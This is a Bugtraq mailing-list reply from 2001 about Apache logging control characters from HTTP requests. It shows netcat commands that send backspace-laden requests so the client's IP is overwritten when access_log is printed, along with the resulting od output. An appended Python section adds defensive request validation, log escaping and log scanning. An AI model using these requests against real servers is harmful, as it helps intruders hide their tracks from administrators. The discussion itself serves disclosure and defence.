[18412] in bugtraq
Re: Securax Advisory 12
daemon@ATHENA.MIT.EDU (Alex Muntada)
Wed Jan 3 12:13:36 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20010103122203.C2576@ac.upc.es>
Date: Wed, 3 Jan 2001 12:22:03 +0100
Reply-To: Alex Muntada <alexm@AC.UPC.ES>
From: Alex Muntada <alexm@AC.UPC.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <001101c07402$585fbdc0$8656e0d5@pandora.be>; from
incubus@SECURAX.ORG on Mon, Jan 01, 2001 at 03:51:38PM +0100
incubus wrote:
> When the backspace character is sent, after a NULL terminated
> request, we will get an answer, the page we requested, but our
> entry in the access_log file is kinda altered. We can overwrite
> our IP address when someone wants to cat the logfile to the
> screen or maybe also to a device (such as: > /dev/lp0),
NUL terminated request aside, the backspace (and any other
control characters) logging in httpd logs had been discussed some
time ago, as you can see below -- for details, see Bugtraq archives
http://www.securityfocus.com/archive/1/11840
mnemonix wrote:
> The problem relates to "allowable" REQUEST_METHODs when a dynamic
> resource, such as a CGI script is requested. Essentially _any_
> (except for HEAD, TRACE and OPTIONS) REQUEST_METHOD can be used -
> even methods not defined in the HTTP protocol. Consider the
> following requests which all return the requested resource.
>
> GET /cgi-bin/environ.cgi HTTP/0.9
>
> Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0
>
> Even Control characters are allowed. Consider the following:
>
> ^H^H^H^H^H^H^H^H^H lots of these ^H^H /cgi-bin/environ.cgi HTTP/1.1
Sevo Stille wrote:
> Of course control chars are and must be allowed - CGI is defined
> to be transparent towards the application. For a request
> satisfied by the server, the server would have to (and at any
> rate apache does) return a 501 method not implemented error,
> according to the specs, par. 5.1.1.1
Henrik Nordstrom wrote:
> Not really. RFC 2068 defines method as a token, which is "1*<any
> CHAR except CTLs or tspecials>" so the above may be rejected with a
> "400 Bad Request" reply as it is not valid HTTP syntax.
>
> HTTP puts restrictions on which characters that are allowable in
> all parts of the protocol except the message body.
So it does apply to the entire Request-Line and Simple-Request (as
depicted in the Securax advisory).
Tested Apache 1.3.14 (source compiled httpd) and it still accepts
control chars in HTTP requests, but it shouldn't, as pointed out by
Henrik Nordstrom.
Just a last comment on kosheen.c: on my tests against apache, it
seems to discard anything after NUL byte, so kosheen doesn't work
as expected unless NUL is removed:
% cat <<EOF | nc www.example.com 80
GET /index.html HTTP/1.0^@^H^H^H^H
EOF
....HTML....
% tail -1 access_log | od -c
0000000 w w w . e x a m p l e . c o m
0000020 - - [ 0 3 / J a n / 2 0 0 1
0000040 : 1 1 : 4 5 : 1 4 + 0 1 0 0 ]
0000060 " G E T / i n d e x . h t m
0000100 l H T T P / 1 . 0 " 2 0 0
0000140 4 8 5 9 - - \n
% cat <<EOF | nc www.example.com 80
GET /index.html HTTP/1.0^H^H^H^H
EOF
....HTML....
% tail -1 access_log | od -c
0000000 w w w . e x a m p l e . c o m
0000020 - - [ 0 3 / J a n / 2 0 0 1
0000040 : 1 1 : 4 5 : 1 4 + 0 1 0 0 ]
0000060 " G E T / i n d e x . h t m
0000100 l H T T P / 1 . 0 \b \b \b \b "
0000140 2 0 0 4 8 5 9 - - \n
Best,
Alex
--
Alex Muntada <alexm@ac.upc.es>
http://www.ac.upc.es/homes/alexm/
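The two defensive measures the thread converges on, as an added example that is not code from the thread, from Apache or from kosheen.c: a Request-Line checker that applies the RFC 2068 token grammar Henrik Nordstrom cites (any CTL in the line yields 400, an unknown but well-formed method yields the 501 Sevo Stille mentions), a log-field escaper that rewrites control characters as \xHH before they reach access_log so a backspace can no longer erase the host column on a terminal, and a scanner that flags existing log lines already carrying raw control characters. The implemented-method list, the \xHH escaping convention and the sample log lines are assumptions constructed for the example.

```python
import re
from typing import List, Tuple

# RFC 2068 section 2.2 grammar (transcribed from the RFC):
#   CTL       = <any US-ASCII control character (octets 0 - 31) and DEL (127)>
#   tspecials = "(" | ")" | "<" | ">" | "@" | "," | ";" | ":" | "\" | <">
#             | "/" | "[" | "]" | "?" | "=" | "{" | "}" | SP | HT
#   token     = 1*<any CHAR except CTLs or tspecials>
TSPECIALS = frozenset('()<>@,;:\\"/[]?={} \t')

# Methods this hypothetical server implements (assumption: the RFC 2068 list).
IMPLEMENTED = frozenset({'OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE'})
VERSION_RE = re.compile(r'^HTTP/\d+\.\d+$')


def is_ctl(octet: int) -> bool:
    """RFC 2068 CTL: octets 0-31 and DEL."""
    return octet < 32 or octet == 127


def is_token(s: str) -> bool:
    """True if s is a non-empty RFC 2068 token (ASCII, no CTLs, no tspecials)."""
    return bool(s) and all(ord(c) < 128 and not is_ctl(ord(c)) and c not in TSPECIALS
                           for c in s)


def request_line_status(raw: bytes) -> int:
    """Status a strict server should answer for a raw Request-Line:
    200 = syntactically valid and implemented, 400 = bad syntax,
    501 = well-formed token but method not implemented."""
    line = raw.rstrip(b'\r\n')
    # Any CTL (NUL, BS, ...) or non-ASCII octet anywhere in the Request-Line
    # is outside the grammar: reject before even looking at the method.
    if any(is_ctl(b) or b > 127 for b in line):
        return 400
    parts = line.decode('ascii').split(' ')
    if len(parts) == 2:  # HTTP/0.9 Simple-Request: "GET" SP Request-URI
        method, uri = parts
        return 200 if method == 'GET' and uri else 400
    if len(parts) != 3:
        return 400
    method, uri, version = parts
    if not is_token(method) or not uri or not VERSION_RE.match(version):
        return 400
    if method not in IMPLEMENTED:
        return 501
    return 200


def escape_log_field(s: str) -> str:
    """Escape a field before it is written to access_log: backslash and
    double quote get a backslash, every non-printable character becomes
    \\xHH, so `cat` or a printer can never reinterpret it as a control code."""
    out = []
    for c in s:
        o = ord(c)
        if c == '\\':
            out.append('\\\\')
        elif c == '"':
            out.append('\\"')
        elif o < 32 or o >= 127:
            out.append('\\x%02x' % o)
        else:
            out.append(c)
    return ''.join(out)


def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Flag log lines that already contain raw control characters (what the
    thread's `od -c` output shows). Returns (line number, hex codes found)."""
    hits = []
    for n, line in enumerate(lines, 1):
        ctls = sorted({'%02x' % ord(c) for c in line.rstrip('\n') if is_ctl(ord(c))})
        if ctls:
            hits.append((n, ' '.join(ctls)))
    return hits


# Constructed sample access_log lines: a clean entry and one carrying the
# four backspaces from the thread's second request.
SAMPLE_LOG = [
    'www.example.com - - [03/Jan/2001:11:45:14 +0100] "GET /index.html HTTP/1.0" 200 4859\n',
    'www.example.com - - [03/Jan/2001:11:45:14 +0100] "GET /index.html HTTP/1.0\b\b\b\b" 200 4859\n',
]

if __name__ == '__main__':
    for req in (b'GET /index.html HTTP/1.0',
                b'GET /index.html HTTP/1.0\x08\x08\x08\x08',
                b'Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0'):
        print(request_line_status(req), escape_log_field(req.decode('latin-1')))
    print(scan_access_log(SAMPLE_LOG))
```

The escaper is applied to the request field only because that is the field the client controls; the scanner is what you would run over an existing access_log before trusting it on a terminal.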